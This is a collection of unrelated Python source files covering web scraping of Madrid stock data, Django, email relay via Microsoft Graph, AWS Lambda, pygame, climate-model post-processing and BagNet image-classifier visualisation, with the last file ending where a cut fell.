|
import requests
from bs4 import BeautifulSoup
url = "https://www.bolsamadrid.es/esp/aspx/Empresas/InfHistorica.aspx?ISIN=ES0125220311&ClvEmis=25220"
historico = requests.get(url)
soup = BeautifulSoup(historico.text, 'html.parser')
#Obtener la primera fecha del historico
stock_price_list = soup.find(id='ctl00_Contenido_tblDatos')
first_date = stock_price_list.tr.next_sibling
print('Fecha minima inicial')
print(first_date.td.string)
print()
headers = {"Content-Type": "application/x-www-form-urlencoded"}
#data = "__VIEWSTATE=aWd24Hetn%2F7hc9v9QS8JxB3IcDJn6pm%2BVwo47jOyUwBUcPHwkSXuymigdhDR0RfPfmKWgaSJdm%2F%2BzEwiT5IVtDXuA87XhmdqznKmDfAA6F3mn8rekZN5Hcc5VlIldXaRfuGYkySTZv7q8Q6SUKN11KDockijh1k2q8TykbNOecUxcZkayp72VjM0Dv7%2FpveT5G%2BWWu8q2ED6%2B4etSNiyWyZm2FlX0Dv%2FYhUSIM03%2FH6Y4C%2F4dByVTlJxd%2Bk8I%2Bqs5q%2FEUHzY1%2FgT41s4twb5z5BFpEqrwNUi4sQPzrMXXcbYIPepUG93UI48%2BB7YhaU66fgcObbF7Hy4%2FT4%2FwjeCD7VrkHjcj%2FbErEfw1siroiDk486XNPHuO3T6zcU0H%2FtSpOldT6f8cy2r8M18Y5qGYlpvRW4CD2W7RFy%2FrUO8S5B%2BVQ7PdFYx19aRkwaMaSYafhZecVU6jxFLWJygcmqvmqFP%2BNzx7xwIs2S9jLEyJ%2Fb3i3DTRVhrN02h404SYiqI1G14D%2BCw2SQtPhOoMQoCU3q2KOtRFszTxG3Dmrn7dUNWudnUs9s%2FtnRgjiT8JMHQK38dFWJP2S2rqRyvUJOmjOwrbSpahqIHkIaYc0babbscxWMo0nTKz2ry6Ua4nI2HjWnAAyf7HwWfqIT3ik1ZNF1mPuw%3D&__VIEWSTATEGENERATOR=1538A4A5&__EVENTVALIDATION=W7RUMYmlXBDtr1L5xNo9RgnVFrUtNEINt8xgp7YqieDuDunRdF3qvo6sE6jjWkasyRNDVVKWrE%2BnVbl58GOXxd0pS%2FyTgD6vkkkcHHyWcJRkVXcjcDKcTsdjeyBDAWxAFHQXBV2Y8ZwoGRtUlGWfesdLL%2F5d%2B0PEiq5ffXKSOMczDj8UzeOBQylkonRTXO1RDUEz1%2BLH4ovnKylc0gvS1fX3mYc6DUR%2BRMXrkqqH9Nk7o%2BNgbou2GjFQwmsIesHIyPYLOsPaxO1oFsRCFT4WrRXcBsM%3D&ctl00%24Contenido%24Desde%24Dia=24&ctl00%24Contenido%24Desde%24Mes=09&ctl00%24Contenido%24Desde%24A%C3%B1o=2019&ctl00%24Contenido%24Hasta%24Dia=23&ctl00%24Contenido%24Hasta%24Mes=10&ctl00%24Contenido%24Hasta%24A%C3%B1o=2019&ctl00%24Contenido%24Buscar=+Buscar+"
def getFormData(soup,initialDay, initialMonth, initialYear, finalDay, finalMonth, finalYear):
return {
'__EVENTTARGET': '',
'__EVENTARGUMENT': '',
'__VIEWSTATE': soup.find(id='__VIEWSTATE')['value'],
'__VIEWSTATEGENERATOR': soup.find(id='__VIEWSTATEGENERATOR')['value'],
'__EVENTVALIDATION': soup.find(id='__EVENTVALIDATION')['value'],
'ctl00$Contenido$Desde$Dia': initialDay,
'ctl00$Contenido$Desde$Mes': initialMonth,
'ctl00$Contenido$Desde$Año': initialYear,
'ctl00$Contenido$Hasta$Dia': finalDay,
'ctl00$Contenido$Hasta$Mes': finalMonth,
'ctl00$Contenido$Hasta$Año': finalYear,
'ctl00$Contenido$Buscar': 'Buscar'
}
data = getFormData(soup,10,2,2020,5,10,2020)
page = requests.post(url, data=data, headers = headers)
bs = BeautifulSoup(page.content, 'html.parser')
#Obtener la primera fecha del historico
stock_price_list = bs.find(id='ctl00_Contenido_tblDatos')
first_date = stock_price_list.tr.next_sibling
print('Fecha mínima despues de consulta')
print(first_date.td.string)
print()
#print(bs)
|
# Generated by Django 3.1 on 2020-09-16 06:52
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('package', '0006_auto_20200916_1440'),
]
operations = [
migrations.RenameField(
model_name='packageline',
old_name='fulfilmentline',
new_name='fulfillmentline',
),
]
|
import json
import shutil
import os
from . import utils
class PatchesCollection(object):
def __init__(self, path):
self.path = path
self.json_path = os.path.join(self.path, 'patches.json')
self.exists = os.path.isfile(self.json_path)
self.patches_json = {}
self.images = []
self.masks = []
if self.exists:
with open(self.json_path, 'r') as f:
self.patches_json = json.load(f)
self.sync_patches_json()
def create(self, crop_dimension, has_masks=True):
if self.exists:
raise RuntimeError('The patches collection already exists. Destroy it first.')
self.patches_json = {
'crop_dimension': crop_dimension,
}
utils.ensure_dir(self.get_images_path())
if has_masks:
utils.ensure_dir(self.get_masks_path())
self.store_patches_json()
self.sync_patches_json()
self.exists = True
def get_images_path(self):
return os.path.join(self.path, 'images')
def get_images_paths(self):
base = self.get_images_path()
return [os.path.join(base, file) for file in self.images]
def get_masks_path(self):
return os.path.join(self.path, 'masks')
def get_masks_paths(self):
base = self.get_masks_path()
return [os.path.join(base, file) for file in self.masks]
def store_patches_json(self):
utils.ensure_dir(self.path)
with open(self.json_path, 'w') as f:
json.dump(self.patches_json, f, indent = 3)
def sync_patches_json(self):
for key, value in self.patches_json.items():
setattr(self, key, value)
def fill(self, values):
self.patches_json.update(values)
self.store_patches_json()
self.sync_patches_json()
def destroy(self):
shutil.rmtree(self.path)
for key in self.patches_json:
if hasattr(self, key):
delattr(self, key)
self.patches_json = {}
self.image = []
self.masks = []
self.exists = False
|
import logging
import os
from abc import abstractmethod, ABC
from msgraph_async import GraphAdminClient
from msgraph_async.common import GraphClientException
from ModernRelay import exceptions
class DeliveryAgentBase(ABC):
"""
Abstract base class for delivery agents.
Extend this class and attach the decorator to your subclass to create a new delivery agent
"""
subclasses = {}
def __init__(self):
self.logger = logging.getLogger("ModernRelay.log")
@classmethod
def register_subclass(cls, agent):
def decorator(subclass):
cls.subclasses[agent] = subclass
return subclass
return decorator
@classmethod
def create(cls, agent):
if agent not in cls.subclasses:
raise exceptions.DeliveryAgentException(f"Agent type {agent} not registered in "
f"DeliveryAgentBase.subclasses! Did you decorate your class with "
f"@DeliveryAgentBase.register_subclass()?")
return cls.subclasses[agent]()
@abstractmethod
async def send_mail(self, message: dict, headers: dict = None, attachments: dict = None) -> bool:
pass
@DeliveryAgentBase.register_subclass('GraphDeliveryAgent')
class GraphDeliveryAgent(DeliveryAgentBase):
def __init__(self):
super().__init__()
self.graph = None
if not os.getenv('MR_MS365_APP_ID'):
raise exceptions.DeliveryAgentException("Environment variable MR_MS365_APP_ID is not set!")
if not os.getenv('MR_MS365_APP_SECRET'):
raise exceptions.DeliveryAgentException("Environment variable MR_MS365_APP_SECRET is not set!")
if not os.getenv('MR_MS365_TENANT_ID'):
raise exceptions.DeliveryAgentException("Environment variable MR_MS365_TENANT_ID is not set!")
async def send_mail(self, message: dict, headers: dict = None, attachments: dict = None) -> bool:
if not self.graph:
self.graph = GraphAdminClient()
ret = False
try:
if not self.graph.is_managed:
await self.graph.manage_token(os.getenv('MR_MS365_APP_ID'),
os.getenv('MR_MS365_APP_SECRET'),
os.getenv('MR_MS365_TENANT_ID'))
message['body_type'] = "HTML" if message['body_type'] == "text/html" else "Text"
resp = await self.graph.send_mail(
message,
headers=headers,
attachments=attachments)
ret = 200 <= resp[-1] < 300
self.logger.debug(f"GraphDeliveryAgent:send_mail: HTTP Response: {resp[-1]}, HTTP Status:{resp[0]}")
except GraphClientException as ex:
self.logger.exception(f"Error: sendmail failed. {ex.message}")
except Exception as ex:
self.logger.exception(f"Error: sendmail failed at authentication. {ex.args[0]}")
return ret
|
import os
import boto3
ssm = boto3.client("ssm")
SHADOW_ENDPOINT_SSM = os.environ.get("SHADOW_ENDPOINT_SSM")
def lambda_handler(event, context):
print(event)
shadow_endpont_name = dict(event)["job_name"]
response = ssm.put_parameter(
Name=SHADOW_ENDPOINT_SSM, Value=shadow_endpont_name, Overwrite=True
)
|
import pygame
from os import path
from sys import argv
class Button:
def __init__(self, position, value, label):
filePath = path.dirname(argv[0])
self.buttonSound = pygame.mixer.Sound(filePath+"/resources/audio/button.wav")
self.buttonSound.set_volume(.25)
self.buttonSoundChannel = pygame.mixer.Channel(5)
buttonFont = pygame.font.SysFont('krungthep', 25)
baseButtonImage = pygame.image.load(filePath + "/resources/images/button.png").convert()
activeButtonImage = pygame.image.load(filePath + "/resources/images/activeButton.png").convert()
self.unPressedImage = baseButtonImage.copy()
self.pressedImage = activeButtonImage.copy()
self.collisionArea = self.unPressedImage.get_rect(center=position)
"""Jesus Christ this is a Mess"""
textToRender = buttonFont.render(label, 1, (255, 0, 0))
textSize = buttonFont.size(label)
txS2 = [textSize[0] / 2.0, textSize[1] / 2.0]
adjustedCollisionArea = [self.collisionArea[2] / 2.0, self.collisionArea[3] / 2.0]
textLocation = [adjustedCollisionArea[0] - txS2[0], adjustedCollisionArea[1] - txS2[1],
textSize[0], textSize[1]]
self.unPressedImage.blit(textToRender, textLocation)
self.pressedImage.blit(textToRender, textLocation)
self.value = value
self.playPressedSound = False
self.pressedImage.set_colorkey((255, 255, 255))
self.unPressedImage.set_colorkey((255, 255, 255))
def draw(self):
mousePoint = pygame.mouse.get_pos()
if self.collisionArea.collidepoint(mousePoint[0], mousePoint[1]):
if self.playPressedSound:
self.buttonSoundChannel.play(self.buttonSound)
self.playPressedSound = False
return self.pressedImage
else:
self.playPressedSound = True
return self.unPressedImage
def testMouseCollision(self):
mousePoint = pygame.mouse.get_pos()
if self.collisionArea.collidepoint(mousePoint[0], mousePoint[1]):
return self.value
else:
return 0
|
import sys
import asyncio
import threading
from pathlib import Path
import asyncio
import time
import pytest
from nextline import Nextline
##__________________________________________________________________||
statement = """
import script
script.run()
""".strip()
##__________________________________________________________________||
@pytest.fixture(autouse=True)
def monkey_patch_syspath(monkeypatch):
this_dir = Path(__file__).resolve().parent
monkeypatch.syspath_prepend(str(this_dir))
yield
##__________________________________________________________________||
async def monitor_global_state(nextline):
async for s in nextline.subscribe_global_state():
print(s)
async def control_execution(nextline):
controllers = {}
async for ids in nextline.subscribe_thread_asynctask_ids():
prev_ids = list(controllers.keys())
new_ids = [id_ for id_ in ids if id_ not in prev_ids]
ended_ids = [id_ for id_ in prev_ids if id_ not in ids]
for id_ in new_ids:
task = asyncio.create_task(control_thread_task(nextline, id_))
controllers[id_] = task
for id_ in ended_ids:
del controllers[id_]
async def control_thread_task(nextline, thread_task_id):
print(thread_task_id)
async for s in nextline.subscribe_thread_asynctask_state(thread_task_id):
print(s)
if s['prompting']:
nextline.send_pdb_command(thread_task_id, 'next')
##__________________________________________________________________||
@pytest.mark.asyncio
async def test_run():
nextline = Nextline(statement)
assert nextline.global_state == 'initialized'
task_monitor_global_state = asyncio.create_task(monitor_global_state(nextline))
# await asyncio.sleep(0)
task_control_execution = asyncio.create_task(control_execution(nextline))
nextline.run()
await nextline.finish()
assert nextline.global_state == 'finished'
await nextline.close()
assert nextline.global_state == 'closed'
##__________________________________________________________________||
|
import pygame
def lePlaylistDeArquivo(NomeArq):
arquivo = open(NomeArq, 'r')
linhas = []
for linha in arquivo:
linhaLida = linha.strip().split('#')
linhas.append(linhaLida)
arquivo.close
return linhas
def listar_playlist(playlist):
for lista in playlist:
print(f'Banda: {lista [0]} Música: {lista[1]} Gênero: {lista[2]}')
def pesquisa_musica_por_genero(genero_pesq):
for msc in playlist:
if (msc[2] == genero_pesq):
print(f'{msc [1]}')
def tocar_musica_playlist(musica_tocar):
pygame.mixer.music.load(musica_tocar)
pygame.mixer.music.play(musica_tocar)
print('='*30)
print("Inicio do Player de Músicas")
print("="*30)
pygame.mixer.init()
musica=input('nome da musica:')
nomealterado=musica+'.mp3'
pygame.mixer.music.load(nomealterado)
pygame.mixer.music.play()
while True:
opcoes_playlist = int(input('Digite uma opção:\n1.Aperte para pausar\n2.Aperte para retomar\n3.Aperte para trocar a música\n4.Aperte para sair'))
if (opcoes_playlist == 1):
pygame.mixer.music.pause()
elif (opcoes_playlist == 2):
pygame.mixer.music.unpause()
elif (opcoes_playlist == 3):
msc_tocar = input('Digite o nome da música')
pygame.mixer.music.stop()
pygame.mixer.music.load(nomealterado)
pygame.mixer.music.play()
elif(opcoes_playlist == 4):
print('fim')
break
#PROGRAMA PRINCIPAL
playlist = lePlaylistDeArquivo('playlistMusicas.txt')
numColunas = len(playlist[0])
numLinhas = len(playlist)
print(numColunas)
acabou = False
while (acabou == False):
opcao = int(input(f'Digite uma opção:\n1.Listar músicas da playlist\n2.Pesquisar música por gênero\n3.Cadastrar música\n4.Tocar uma música\n'))
if (opcao == 1):
listar_playlist(playlist)
elif (opcao == 2):
genero_pesq = input('Qual o gênero a pesquisar?')
pesquisa_musica_por_genero(genero_pesq)
elif (opcao == 3):
banda = input('Digite o nome da banda\n')
msc = input('Digite o nome da música\n')
genero = input('Digite o gênero da música')
lista = [banda, msc, genero]
playlist.append(lista)
elif (opcao ==4):
play1 = input('Digite o nome da música que você deseja ouvir')
play2=play1+'.mp3'
tocar_musica_playlist(play2) |
# Create yearly and monthly mean files for chosen vars
import sys
import numpy as np
import pandas as pd
from netCDF4 import Dataset
import xarray as xr
import dask
from dask.diagnostics import ProgressBar
import os, fnmatch
from resource import *
#import matplotlib.pyplot as plt
import calendar
import plot_maps3
dask.config.set(**{'array.slicing.split_large_chunks': False})
y = sys.argv[1]
y = int(y)
period = sys.argv[2]
plot = False
#matplotlib.use('Agg') # To not open a plot window
domain = 'd02'
#varlist = list(['T','RR','RH','QCLOUD','QRAIN','QSNOW','QGRAUP','QVAPOR','zerocross'])
#varlist = list(['QCLOUD','QRAIN','QSNOW','QGRAUP'])
#varlist = list(['SR','rr','RH','QVAPOR'])
varlist = list(['QVAPOR'])
m1 = '012' # '1[%s]' %mnt1
m2 = '1234'
#Dirs
if period == 'warm':
dirr = '/mnt/elephant/WRFsimulations/ICEBOX_PGW'
elif period == 'past':
dirr = '/mnt/elephant/WRFsimulations/KVT_NSF02'
wrfdir = ('%s/archive2/postpost' %dirr)
outdir = ('./files/%s' %period)
figdir = ('./figures')
########### The main routine ##################
listOfFiles = os.listdir(wrfdir)
listOfFiles.sort()
i=0
for entry in listOfFiles:
if fnmatch.fnmatch(entry,'wrfout_%s_%i-1[%s].nc4' %(domain,y,m1)) \
or fnmatch.fnmatch(entry,'wrfout_%s_%i-0[%s].nc4' %(domain,y+1,m2)):
i=i+1
wrf1 = xr.open_mfdataset('%s/%s' %(wrfdir,entry), drop_variables={'T','XTIME'},\
chunks={'Time':720, 'bottom_top':10, 'south_north': 32, 'west_east': 32,\
'soil_layers_stag':4, 'bottom_top_stag':10, 'west_east_stag':32, 'south_north_stag':32})
wrf1 = wrf1.sel(bottom_top=slice(0,10),bottom_top_stag=slice(0,10))
if i==1:
wrf = wrf1
else:
wrf = xr.concat([wrf,wrf1], dim="Time")
wrf = wrf.assign_coords(Time=wrf.times)
for v in varlist:
if v == 'T':
T = wrf['TEMPERATURE']-273
T.attrs['units'] = 'C'
T = T.groupby('Time.month').mean('Time')
#T.to_netcdf('%s/%i_%s_T_mean.nc' %(outdir,y,period))
delayed_obj = T.to_netcdf('%s/%i_%s_T_mean.nc' %(outdir,y,period), compute=False)
with ProgressBar():
results = delayed_obj.compute()
if v == 'RR':
RR = wrf['RAINNC'].diff("Time") # Get hourly precip rate from accumulated time series
RR = RR.groupby('Time.month').sum('Time')
delayed_obj = RR.to_netcdf('%s/%i_%s_RR_sums.nc' %(outdir,y,period), compute=False)
with ProgressBar():
results = delayed_obj.compute()
if v == 'SR':
SR = wrf['SNOWNC'].diff("Time") # Get hourly precip rate from accumulated time series
SR = SR.groupby('Time.month').sum('Time')
delayed_obj = SR.to_netcdf('%s/%i_%s_SR_sums.nc' %(outdir,y,period), compute=False)
with ProgressBar():
results = delayed_obj.compute()
if v == 'FF':
FF = wrf['FF']
FF = FF.groupby('Time.month').mean('Time')
delayed_obj = FF.to_netcdf('%s/%i_%s_FF_mean.nc' %(outdir,y,period), compute=False)
with ProgressBar():
results = delayed_obj.compute()
if v == 'RH':
T = wrf['TEMPERATURE']
P = wrf['PRESSURE']
q = wrf['QVAPOR']
RH = (0.263*P*q)/(np.exp((17.67*(T-273.15))/(T-29.65)))
RH.attrs['description'] = 'Relative humidity'
RH.attrs['units'] = '%'
RH = RH.groupby('Time.month').mean('Time')
delayed_obj = RH.to_netcdf('%s/%i_%s_RH_mean.nc' %(outdir,y,period), compute=False)
with ProgressBar():
results = delayed_obj.compute()
if 'Q' in v:
#qvar = cloud_water(wrf,v) # Convert to kg/m3
qvar = wrf[v]
qvar = qvar.groupby('Time.month').sum('Time')
delayed_obj = qvar.to_netcdf('%s/%i_%s_%s_sums.nc' %(outdir,y,period,v),compute=False)
with ProgressBar():
results = delayed_obj.compute()
if v == 'P':
P = wrf['PRESSURE']
P = P.groupby('Time.month').mean('Time')
delayed_obj = P.to_netcdf('%s/%i_%s_P_mean.nc' %(outdir,y,period), compute=False)
with ProgressBar():
results = delayed_obj.compute()
if v == 'Z':
try:
Z = wrf['Z']
except:
g = 9.81
P = wrf['PRESSURE']
T = wrf['TEMPERATURE']
P0 = 10132500
R = 8.3143
M = 0.02896
Z = -((R*T)/(M*g))*np.exp(P/P0)
Z.attrs['description'] = 'Height'
Z.attrs['units'] = 'm'
Z = Z.groupby('Time.month').mean('Time')
delayed_obj = Z.to_netcdf('%s/%i_%s_H_mean.nc' %(outdir,y,period), compute=False)
with ProgressBar():
results = delayed_obj.compute()
if v == 'zerocross':
T = wrf['TEMPERATURE'][:,0]-273
Tdiff = T.diff("Time",label='upper')
T = T[1:]
da = xr.full_like(T,fill_value=0)
mask = ((Tdiff>0) & (T==0))
da = xr.where(mask, 1, da)
zerocross = da.groupby('Time.month').sum('Time')
delayed_obj = zerocross.to_netcdf('%s/%i_%s_%s_sums.nc' %(outdir,y,period,v),compute=False)
with ProgressBar():
results = delayed_obj.compute()
##### Plotting #######
if plot:
plot_maps3.plot_mnt_tots(varlist,y,period)
|
import numpy as np
import matplotlib.pyplot as plt
from skimage import feature, transform
from bagnets.pytorch import Bottleneck
from keras.preprocessing import image as KImage
import time
import torch
import torch.nn as nn
import math
import logging
from torch.utils import model_zoo
model_urls = {
'bagnet9': 'https://bitbucket.org/wielandbrendel/bag-of-feature-pretrained-models/raw/249e8fa82c0913623a807d9d35eeab9da7dcc2a8/bagnet8-34f4ccd2.pth.tar',
'bagnet17': 'https://bitbucket.org/wielandbrendel/bag-of-feature-pretrained-models/raw/249e8fa82c0913623a807d9d35eeab9da7dcc2a8/bagnet16-105524de.pth.tar',
'bagnet33': 'https://bitbucket.org/wielandbrendel/bag-of-feature-pretrained-models/raw/249e8fa82c0913623a807d9d35eeab9da7dcc2a8/bagnet32-2ddd53ed.pth.tar',
}
def image_partition(seed, partition_size):
idx_lst = np.arange(50000)
np.random.seed(seed)
np.random.shuffle(idx_lst)
num_per_partition = int(50000/partition_size)
idx_lst = np.split(idx_lst, num_per_partition)
return idx_lst
def plot_heatmap(heatmap, original, ax, cmap='RdBu_r',
percentile=99, dilation=0.5, alpha=0.25):
"""
Plots the heatmap on top of the original image
(which is shown by most important edges).
Parameters
----------
heatmap : Numpy Array of shape [X, X]
Heatmap to visualise.
original : Numpy array of shape [X, X, 3]
Original image for which the heatmap was computed.
ax : Matplotlib axis
Axis onto which the heatmap should be plotted.
cmap : Matplotlib color map
Color map for the visualisation of the heatmaps (default: RdBu_r)
percentile : float between 0 and 100 (default: 99)
Extreme values outside of the percentile range are clipped.
This avoids that a single outlier dominates the whole heatmap.
dilation : float
Resizing of the original image. Influences the edge detector and
thus the image overlay.
alpha : float in [0, 1]
Opacity of the overlay image.
"""
if len(heatmap.shape) == 3:
heatmap = np.mean(heatmap, 0)
dx, dy = 0.05, 0.05
xx = np.arange(0.0, heatmap.shape[1], dx)
yy = np.arange(0.0, heatmap.shape[0], dy)
xmin, xmax, ymin, ymax = np.amin(xx), np.amax(xx), np.amin(yy), np.amax(yy)
extent = xmin, xmax, ymin, ymax
cmap_original = plt.get_cmap('Greys_r')
cmap_original.set_bad(alpha=0)
overlay = None
if original is not None:
# Compute edges (to overlay to heatmaps later)
original_greyscale = original if len(original.shape) == 2 else np.mean(original, axis=-1)
in_image_upscaled = transform.rescale(original_greyscale, dilation, mode='constant',
multichannel=False, anti_aliasing=True)
edges = feature.canny(in_image_upscaled).astype(float)
edges[edges < 0.5] = np.nan
edges[:5, :] = np.nan
edges[-5:, :] = np.nan
edges[:, :5] = np.nan
edges[:, -5:] = np.nan
overlay = edges
abs_max = np.percentile(np.abs(heatmap), percentile)
abs_min = abs_max
ax.imshow(heatmap, extent=extent, interpolation='none', cmap=cmap, vmin=-abs_min, vmax=abs_max)
if overlay is not None:
ax.imshow(overlay, extent=extent, interpolation='none', cmap=cmap_original, alpha=alpha)
def generate_heatmap_pytorch(model, image, target, patchsize):
"""
Generates high-resolution heatmap for a BagNet by decomposing the
image into all possible patches and by computing the logits for
each patch.
Parameters
----------
model : Pytorch Model
This should be one of the BagNets.
image : Numpy array of shape [1, 3, X, X]
The image for which we want to compute the heatmap.
target : int
Class for which the heatmap is computed.
patchsize : int
The size of the receptive field of the given BagNet.
"""
import torch
with torch.no_grad():
# pad with zeros
_, c, x, y = image.shape
padded_image = np.zeros((c, x + patchsize - 1, y + patchsize - 1))
padded_image[:, (patchsize-1)//2:(patchsize-1)//2 + x, (patchsize-1)//2:(patchsize-1)//2 + y] = image[0]
image = padded_image[None].astype(np.float32)
# turn to torch tensor
input = torch.from_numpy(image).cuda()
# extract patches
patches = input.permute(0, 2, 3, 1)
patches = patches.unfold(1, patchsize, 1).unfold(2, patchsize, 1)
num_rows = patches.shape[1]
num_cols = patches.shape[2]
patches = patches.contiguous().view((-1, 3, patchsize, patchsize))
# compute logits for each patch
logits_list = []
for batch_patches in torch.split(patches, 1000):
logits = model(batch_patches)
logits = logits[:, target][:, 0]
logits_list.append(logits.data.cpu().numpy().copy())
logits = np.hstack(logits_list)
return logits.reshape((224, 224))
##################################################
# Helper functions from 2019-5-22 notebook
# Reference: https://github.com/wielandbrendel/bag-of-local-features-models/blob/master/bagnets/utils.py
##################################################
def pad_image(image, patchsize):
_, c, x, y = image.shape
padded_image = np.zeros((c, x + patchsize - 1, y + patchsize - 1))
padded_image[:, (patchsize-1)//2 : (patchsize-1)//2 + x, (patchsize-1)//2 : (patchsize-1)//2 + y] = image[0]
return padded_image[None].astype(np.float32)
def convert2channel_last(image):
"""Convert the format of image to channel-last format
Input:
-image (numpy array): image, shape = (3, h, w)
"""
return image.transpose([1, 2, 0])
def imagenet_preprocess(image):
# preprocess sample image before training
image = image / 255.
image -= np.array([0.485, 0.456, 0.406])[:, None, None]
image /= np.array([0.229, 0.224, 0.225])[:, None, None]
return image
def extract_patches(image, patchsize, stride=1):
patches = image.permute(0, 2, 3, 1)
patches = patches.unfold(1, patchsize, stride).unfold(2, patchsize, stride)
patches = patches.contiguous().view((-1, 3, patchsize, patchsize))
return patches
def bagnet_predict(model, images, k=1, clip=None, a=1e-2, b=-0.78, return_class=True):
""" Make top-K prediction on IMAGES by MODEL
Inputs:
- model: pytorch model. model for prediction
- images: pytorch tensor. images to be predicted on
- k: number of classes to return for each image (top-k most possible ones)
- clip (clipping): clipping function
- a, b (double): clipping parameters
- return_class: If True, then return classes as prediction; otherwise, return logits and probability of prediction classes
Return:
- indices.cpu().numpy(): numpy array at CPU. prediction K classes
- l.cpu().numpy(): numpy array at CPU. top-K prediction logits
- p.cpu().numpy(): numpy array at CPU. top-K prediction probability
"""
with torch.no_grad():
logits = model(images)
if clip:
assert not model.avg_pool, 'Bagnet should apply clipping before taking average.'
logits = clip(logits, a, b)
logits = torch.mean(logits, dim=(1, 2))
p = torch.nn.Softmax(dim=1)(logits)
p, indices = torch.topk(p, k, dim=1)
l, _ = torch.topk(logits, k, dim=1)
if return_class:
return indices.cpu().numpy()
else:
return l.cpu().numpy(), p.cpu().numpy()
def compare_heatmap(bagnet, patches, gt, target, original, batch_size=1000):
with torch.no_grad():
gt_logits_list, target_logits_list = [], []
for batch_patches in torch.split(patches, batch_size):
logits = bagnet(batch_patches)
gt_logits = logits[:, gt][:, 0]
target_logits = logits[:, target][:, 0]
gt_logits_list.append(gt_logits.data.cpu().numpy().copy())
target_logits_list.append(target_logits.data.cpu().numpy().copy())
gt_logits = np.hstack(gt_logits_list)
target_logits = np.hstack(target_logits_list)
gt_heatmap = gt_logits.reshape((224, 224))
target_heatmap = target_logits.reshape((224, 224))
fig = plt.figure(figsize=(8, 4))
original_image = original[0].transpose([1, 2, 0])
ax = plt.subplot(131)
ax.set_title('original')
plt.imshow(original_image / 255.)
plt.axis('off')
ax = plt.subplot(132)
ax.set_title('ground true class')
plot_heatmap(gt_heatmap, original_image, ax, dilation=0.5, percentile=99, alpha=0.25)
plt.axis('off')
ax = plt.subplot(133)
ax.set_title('target class')
plot_heatmap(target_heatmap, original_image, ax, dilation=0.5, percentile=99, alpha=0.25)
plt.axis('off')
plt.show()
###################################################
###################################################
# Helper functions from 2019-5-23 notebook
###################################################
def class_patch_logits(bagnet, patches, device, batch_size=1000, num_classes=1000):
""" Obtain the logits of all the classes across all the patches
"""
logits_list = []
with torch.no_grad():
for batch_patches in torch.split(patches, batch_size):
logits = bagnet(batch_patches)
for i in range(num_classes):
class_logits = logits[:, i]
logits_list.append(class_logits.data.cpu().numpy().copy())
return np.hstack(logits_list)
###################################################
###################################################
# Helper functions from 2019-5-24 notebook
###################################################
def attack_patch(image, patchsize, num_patches, seed=None):
c, x, y = image.shape
if seed is not None:
np.random.seed(seed)
attacked_x = np.random.choice(range(x), size=num_patches, replace=True)
attacked_y = np.random.choice(range(y), size=num_patches, replace=True)
for xi, yi in zip(attacked_x, attacked_y):
c, h, w = image[:, (xi - (patchsize-1)//2): (xi + (patchsize-1)//2), (yi - (patchsize-1) // 2): (yi + (patchsize-1) // 2)].shape
image[:, (xi - (patchsize-1)//2): (xi + (patchsize-1)//2), (yi - (patchsize-1) // 2): (yi + (patchsize-1) // 2)] = np.random.rand(c, h, w)
return image
###################################################
###################################################
# Helper function from 5-26 notebook
###################################################
def compute_saliency_map(images, labels, model, criterion, device):
"""Compute saliency map accroding to criterion. This implementation is based on the description in https://arxiv.org/abs/1312.6034
Input:
- images (numpy array): images
- labels (numpy array): labels
- model (pytorch model): model
- criterion (pytorch loss function): loss function to compute gradients
- device: context
Output:
- saliency (numpy array): saliency map
"""
images, labels = torch.from_numpy(images).to(device), torch.from_numpy(labels).to(device)
images.requires_grad_(True)
logits = model(images)
loss = criterion(logits, labels)
loss.backward()
saliency = np.amax(np.absolute(images.grad.cpu().numpy()), axis=1)
return saliency
def plot_saliency(images, saliency, alpha=0):
"""Plot saliency map
Input:
- images (numpy array): images
- saliency (numpy array): saliency map
- alpha (float): transparency
"""
for i in range(len(saliency)):
fig = plt.figure(figsize=(8, 4))
ax = plt.subplot(121)
ax.set_title('original')
plt.imshow(convert2channel_last(images[i]))
plt.axis('off')
ax = plt.subplot(122)
ax.set_title('saliency map')
plt.imshow((saliency[i]), cmap=plt.cm.hot)
if alpha:
plt.imshow(convert2channel_last(images[i]), alpha=alpha)
plt.axis('off')
plt.show()
class BottleneckDebug(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, kernel_size=1):
super(BottleneckDebug, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=kernel_size, stride=stride,
padding=0, bias=False) # changed padding from (kernel_size - 1) // 2
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x, **kwargs):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
print('Bottleneck: shape before downsampling {}'.format(x.shape))
residual = self.downsample(x)
if residual.size(-1) != out.size(-1):
print('Bottleneck: shape after downsampling {}'.format(residual.shape))
print('Bottleneck: shape of out {}'.format(out.shape))
diff = residual.size(-1) - out.size(-1)
residual = residual[:,:,:-diff,:-diff]
out += residual
out = self.relu(out)
return out
class BagNetDebug(nn.Module):
def __init__(self, block, layers, strides=[1, 2, 2, 2], kernel3=[0, 0, 0, 0], num_classes=1000, avg_pool=True):
self.inplanes = 64
super(BagNetDebug, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=1, stride=1, padding=0,
bias=False)
self.conv2 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=0,
bias=False)
self.bn1 = nn.BatchNorm2d(64, momentum=0.001)
self.relu = nn.ReLU(inplace=True)
self.layer1 = self._make_layer(block, 64, layers[0], stride=strides[0], kernel3=kernel3[0], prefix='layer1')
self.layer2 = self._make_layer(block, 128, layers[1], stride=strides[1], kernel3=kernel3[1], prefix='layer2')
self.layer3 = self._make_layer(block, 256, layers[2], stride=strides[2], kernel3=kernel3[2], prefix='layer3')
self.layer4 = self._make_layer(block, 512, layers[3], stride=strides[3], kernel3=kernel3[3], prefix='layer4')
self.fc = nn.Linear(512 * block.expansion, num_classes)
self.avg_pool = avg_pool
self.block = block
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
